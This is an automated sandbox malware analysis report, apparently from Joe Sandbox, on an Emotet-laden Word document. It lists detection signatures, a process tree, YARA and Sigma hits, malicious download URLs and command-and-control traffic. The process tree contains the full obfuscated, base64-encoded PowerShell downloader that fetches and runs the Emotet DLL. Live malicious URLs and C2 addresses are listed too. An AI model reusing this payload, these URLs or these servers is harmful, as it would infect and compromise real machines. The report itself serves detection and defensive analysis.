
Analysis Report v22Pc0qA.doc.doc

Overview

General Information

Sample Name: v22Pc0qA.doc.doc
Analysis ID: 347028
MD5: 7a7d325948481b0557b035249bf5c96a
SHA1: 0529727ffad8388fc94155d1652ca65189cda5df
SHA256: 47e4926bc53fb131b2e976d7b1c2f4b3c0f665242aa493d7e21b4df773b60919


Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w10x64
  • WINWORD.EXE (PID: 4180 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
  • cmd.exe (PID: 5632 cmdline: cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD 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 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • conhost.exe (PID: 5620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • msg.exe (PID: 6068 cmdline: msg user /v Word experienced an error trying to open the file. MD5: EEB395D8DD3C1D6593903BD640687948)
    • powershell.exe (PID: 1320 cmdline: POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwA
uAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJwArACcAMwBzACcAKwAoACgAJwAyACkAJwApACkAKwAoACgAJwAoAGMAYQBpAHIAbwBjACcAKwAnAGEAJwArACcAZAAnACkAKQArACcALgBjACcAKwAoACgAJwBvAG0AJwArACcASgApACgAJwArACcAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACgAYwAnACkAKQArACgAJwBnAGkAJwArACcALQAnACsAJwBiAGkAbgBKACcAKQArACgAKAAnACkAKAAzAHMAMgApACgAJwArACcAMQBQACcAKwAnAEIAJwArACcAQgAnACkAKQArACgAKAAnAEoAKQAoADMAcwAyACkAJwArACcAKAAnACkAKQArACcAQAAnACsAKAAnAGgAJwArACcAdAB0ACcAKQArACcAcAAnACsAJwBzACcAKwAoACgAJwA6AEoAKQAoADMAcwAyACcAKwAnACkAKABKACcAKwAnACkAKAAzACcAKQApACsAJwBzACcAKwAoACgAJwAyACkAKAAnACsAJwB3ACcAKQApACsAKAAnAHcAdwAuACcAKwAnAGkAJwArACcAcwBhAHQAZQBjAGgAbgBvACcAKQArACcAbAAnACsAKAAnAG8AJwArACcAZwB5AC4AJwApACsAKAAoACcAYwBvAG0ASgAnACsAJwApACgAMwBzACcAKwAnADIAKQAnACsAJwAoAHQAJwArACcAcgBhAGkAbgBpAG4AZwAnACsAJwBKACkAKAAnACsAJwAzACcAKQApACsAJwBzADIAJwArACgAKAAnACkAJwArACcAKABiAEoAJwArACcAKQAoACcAKQApACsAKAAoACcAMwBzADIAJwArACcAKQAnACkAKQArACgAKAAnACgAQABoAHQAJwArACcAdAAnACkAKQArACcAcAAnACsAJwA6ACcAKwAoACgAJwBKACkAJwApACkAKwAnACgAJwArACcAMwAnACsAKAAoACcAcwAyACcAKwAnACkAKAAnACkAKQArACgAKAA
nAEoAKQAnACkAKQArACgAKAAnACgAMwBzACcAKwAnADIAJwApACkAKwAnACkAJwArACgAKAAnACgAaABvACcAKwAnAHQAZQAnACkAKQArACgAJwBsACcAKwAnAHMAaABpAHYAJwApACsAKAAnAGEAJwArACcAbgBzAGgAJwApACsAKAAoACcALgBjACcAKwAnAG8AbQBKACkAKAAnACkAKQArACcAMwBzACcAKwAoACgAJwAyACkAKABVAHMAJwArACcAZQByAEYAJwArACcAaQAnACkAKQArACgAJwBsACcAKwAnAGUAcwAnACkAKwAnAEoAJwArACgAKAAnACkAKAAnACkAKQArACgAJwAzACcAKwAnAHMAMgAnACkAKwAoACgAJwApACgAJwArACcAOABKACkAJwArACcAKAAzAHMAMgApACcAKQApACsAKAAoACcAKAAnACsAJwBAAGgAJwApACkAKwAoACgAJwB0AHQAcAA6AEoAKQAoADMAcwAyACcAKwAnACkAJwArACcAKAAnACsAJwBKACkAJwArACcAKAAzAHMAMgApACcAKwAnACgAbwB3ACcAKwAnAG4AaQB0AGMAbwAnACkAKQArACgAJwBuAHMAJwArACcAaQAnACsAJwBnAG4AbQBlAG4AdAAuAGMAbwBtACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAcwAnACkAKQArACgAKAAnADIAJwArACcAKQAoACcAKQApACsAKAAnAGYAaQAnACsAJwBsACcAKwAnAGUAcwBKACcAKQArACgAKAAnACkAJwArACcAKAAzACcAKQApACsAJwBzACcAKwAoACgAJwAyACkAKAAnACsAJwBiAEoAJwApACkAKwAnACkAJwArACgAKAAnACgAMwBzADIAKQAnACsAJwAoACcAKQApACsAKAAnAEAAaAB0AHQAJwArACcAcABzACcAKQArACgAKAAnADoAJwArACcASgAnACsAJwApACgAMwBzADIAKQAoAEoAKQAoADMAJwArACcAcwAyACkAJwApACkAKwAoACgAJwAoAGIAJwArACcAMgAnACkAKQArACgAJwBiACcAKwAnAGMAbwBtAC4AYwAnACsAJwBvACcAKwAnAG0ALgBiACcAKQArACcAcgAnACsAKAAoACcASgAnACsAJwApACgAMwBzADIAJwApACkAKwAoACgAJwApACgAJwArACcAcwBpACcAKQApACsAKAAoACcAdABlAEoAKQAnACsAJwAoADMAJwArACcAcwAnACsAJwAyACkAKAAwAEgASgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnADMAcwAyACkAKABAACcAKwAnAGgAJwApACkAKwAoACgAJwB0AHQAcAA6AEoAKQAnACsAJwAoACcAKwAnADMAcwAyACcAKQApACsAKAAoACcAKQAoACcAKwAnAEoAKQAnACkAKQArACgAKAAnACgAMwBzACcAKwAnADIAJwApACkAKwAoACgAJwApACcAKwAnACgAdAAnACsAJwByAGEAbgBzACcAKwAnAGYAZQAnACkAKQArACgAJwByAHMAdQAnACsAJwB2AGEAJwApACsAKAAoACcAbgAnACsAJwAuAGMAbwBtACcAKwAnAEoAKQAnACkAKQArACgAKAAnACgAMwBzACcAKwAnADIAKQAoAHcAcAAtAGEAJwArACcAZAAnACsAJwBtACcAKQApACsAJwBpACcAKwAoACgAJwBuACcAKwAnAEoAKQAoADMAcwAyACcAKwAnACkAKABPACcAKwAnAFYAbAAnACkAKQArACcASgAnACsAKAAoACcAKQAoACcAKQApACsAKAAoACcAMwBzADIAJwArACcAKQAoACcAKQApACsAJwBAACcAKwAnAGgAdAAnACsAKAAnAHQAJwArACcAcABzADoAJwApACsAKAAoACcASgAnACsAJwA
pACcAKwAnACgAMwBzADIAKQAoAEoAJwApACkAKwAoACgAJwApACgAJwArACcAMwBzACcAKQApACsAJwAyACcAKwAoACgAJwApACcAKwAnACgAcABoAHkAcwAnACkAKQArACcAaQAnACsAKAAoACcAbwAtACcAKwAnAHMAdgBkAGgALgAnACsAJwBjAGgASgApACgAMwAnACkAKQArACgAKAAnAHMAMgAnACsAJwApACcAKQApACsAKAAoACcAKAAnACsAJwB3AHAALQBhAGQAJwApACkAKwAoACgAJwBtAGkAbgBKACkAKAAnACsAJwAzACcAKwAnAHMAJwArACcAMgApACgAawAnACsAJwBLAEoAKQAoADMAJwApACkAKwAnAHMAJwArACgAKAAnADIAKQAnACkAKQArACcAKAAnACkAKQAuACIAcgBlAFAAbABgAEEAYwBFACIAKAAoACgAJwBKACcAKwAoACgAJwApACgAJwArACcAMwAnACkAKQArACgAKAAnAHMAMgApACcAKwAnACgAJwApACkAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwAvACcAKQAsACgAJwBoAHcAJwArACcAZQAnACkAKQBbADAAXQApAC4AIgBTAGAAUABMAEkAVAAiACgAJABUAGcAMwB5AHAAdgAwACAAKwAgACQASAAyAHEANgBxAHAAegAgACsAIAAkAEEAcABqADAAdwBtAG8AKQA7ACQAQwBxAG8AdwBiADQAZAA9ACgAKAAnAFgANgAnACsAJwB1AGgAJwApACsAKAAnADAANQAnACsAJwB5ACcAKQApADsAZgBvAHIAZQBhAGMAaAAgACgAJABIAHcAcQBmAGUAbwBuACAAaQBuACAAJABOAGsAcQBfAGcAMABxACAAfAAgAFMATwBgAFIAYABUAC0AbwBiAGAASgBFAEMAdAAgAHsARwBlAGAAVAAtAFIAYQBgAE4ARABvAG0AfQApAHsAdAByAHkAewAkAFYAMABfAHIAaQAwAG4ALgAiAGQAbwB3AGAATgBsAE8AYABBAEQAYABGAGkATABlACIAKAAkAEgAdwBxAGYAZQBvAG4ALAAgACQAWgByAHcAagBoADkAawApADsAJABDAHcAawAxAG8AOABvAD0AKAAoACcAQgAnACsAJwA2AHgAMgBvACcAKQArACcAdwB0ACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAdAAnACsAJwBlACcAKwAnAG0AJwApACAAJABaAHIAdwBqAGgAOQBrACkALgAiAEwAZQBuAGcAYABUAGgAIgAgAC0AZwBlACAANAA0ADAANwA3ACkAIAB7ACYAKAAnAHIAdQAnACsAJwBuACcAKwAnAGQAbABsADMAMgAnACkAIAAkAFoAcgB3AGoAaAA5AGsALAAnACMAMQAnAC4AIgBUAGAAbwBzAHQAYABSAGkAbgBHACIAKAApADsAJABDAGMAcwBrAGkAeAAwAD0AKAAnAFkAJwArACcAMwB2ACcAKwAoACcAYQAyAHQAJwArACcAZwAnACkAKQA7AGIAcgBlAGEAawA7ACQASQA3AGEAYgB6ADYAZwA9ACgAJwBMACcAKwAoACcAdQBoACcAKwAnAGYAbgBxAGsAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFcAXwA2ADIAZgB5ADYAPQAoACcASQAnACsAJwB4AHEAJwArACgAJwBmACcAKwAnADQAOQBsACcAKQApAA== MD5: 95000560239032BC68B4C2FDFCDEF913)
      • rundll32.exe (PID: 6760 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll,#1 MD5: 73C519F050C20580F8A62C849D49215A)
        • rundll32.exe (PID: 6728 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll,#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • rundll32.exe (PID: 6960 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ezfa\bvb.lli',RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • svchost.exe (PID: 7136 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6008 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5616 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000008.00000002.922521031.0000000000F41000.00000020.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000004.00000002.689082292.00000271130C0000.00000004.00000001.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth | 0x2ba:$s1: POwersheLL
00000004.00000003.685190093.000002712B8A4000.00000004.00000001.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth | 0x5b0:$s1: POwersheLL; 0x45c0:$s1: POwersheLL
00000008.00000002.922478242.0000000000F20000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000004.00000002.700514213.000002712B630000.00000004.00000001.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth | 0x191c:$s1: POwersheLL
(6 further entries not shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
8.2.rundll32.exe.f20000.1.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
8.2.rundll32.exe.f40000.2.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
6.2.rundll32.exe.1090000.2.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
6.2.rundll32.exe.1070000.1.raw.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
6.2.rundll32.exe.1070000.1.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
(1 further entry not shown)

Sigma Overview

System Summary:

Sigma detected: Suspicious Encoded PowerShell Command Line
Source: Process started | Author: Florian Roth, Markus Neis | Data: Command: POwersheLL -w hidden -ENCOD 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

Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: https://www.isatechnology.com/training/b/ | Avira URL Cloud: Label: malware
Source: http://transfersuvan.com/wp-admin/OVl/ | Avira URL Cloud: Label: malware
Source: http://arquivopop.com.br/index_htm_files/Kxh/ | Avira URL Cloud: Label: malware
Source: https://cairocad.com/cgi-bin/1PBB/ | Avira URL Cloud: Label: malware
Source: http://ownitconsignment.com/files/b/ | Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: isatechnology.com | Virustotal: Detection: 7%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll | Metadefender: Detection: 52%
Source: C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll | ReversingLabs: Detection: 96%
Multi AV Scanner detection for submitted file
Source: v22Pc0qA.doc.doc | Virustotal: Detection: 72%
Source: v22Pc0qA.doc.doc | Metadefender: Detection: 44%
Source: v22Pc0qA.doc.doc | ReversingLabs: Detection: 86%
Machine Learning detection for dropped file
Source: C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll | Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F593E4 CryptDecodeObjectEx,

Compliance:

Uses new MSVCR Dlls
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll
Uses secure TLS version for HTTPS connections
Source: unknown | HTTPS traffic detected: 194.209.195.106:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 35.208.182.43:443 -> 192.168.2.4:49744 version: TLS 1.2
Binary contains paths to debug symbols
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000004.00000003.687729373.000002712B84E000.00000004.00000001.sdmp
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F4A461 FindFirstFileW,
Source: global traffic | DNS query: name: physio-svdh.ch
Source: global traffic | TCP traffic: 192.168.2.4:49742 -> 194.209.195.106:443 (2 occurrences)
Source: global traffic | TCP traffic: 192.168.2.4:49773 -> 50.116.111.59:8080
Source: Joe Sandbox View | IP Address: 97.120.3.198 (2 occurrences)
Source: Joe Sandbox View | IP Address: 50.116.111.59
Source: Joe Sandbox View | ASN Name: CENTURYLINK-US-LEGACY-QWESTUS
Source: Joe Sandbox View | ASN Name: GOOGLE-2US
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic | HTTP traffic detected:
  POST /hzctvbal94fl2bqa/ HTTP/1.1
  DNT: 0
  Referer: 173.249.20.233/hzctvbal94fl2bqa/
  Content-Type: multipart/form-data; boundary=------------------eWKPCakCSQtYkd9BaQ
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 173.249.20.233:443
  Content-Length: 8516
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: unknown | TCP traffic detected without corresponding DNS query: 97.120.3.198 (3 occurrences)
Source: unknown | TCP traffic detected without corresponding DNS query: 70.180.33.202 (3 occurrences)
Source: unknown | TCP traffic detected without corresponding DNS query: 50.116.111.59 (3 occurrences)
Source: unknown | TCP traffic detected without corresponding DNS query: 173.249.20.233 (6 occurrences)
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F414E6 InternetReadFile,
Source: svchost.exe, 0000000F.00000003.750703911.00000279643DD000.00000004.00000001.sdmp | String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI", equals www.facebook.com (Facebook)
Source: svchost.exe, 0000000F.00000003.750703911.00000279643DD000.00000004.00000001.sdmp | String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI", equals www.twitter.com (Twitter)
Source: svchost.exe, 0000000F.00000003.750584532.00000279643EB000.00000004.00000001.sdmp | String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-01-28T09:10:05.3582025Z||.||5328ddc5-b339-498a-8e19-ab9110f64f21||1152921505693002334||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
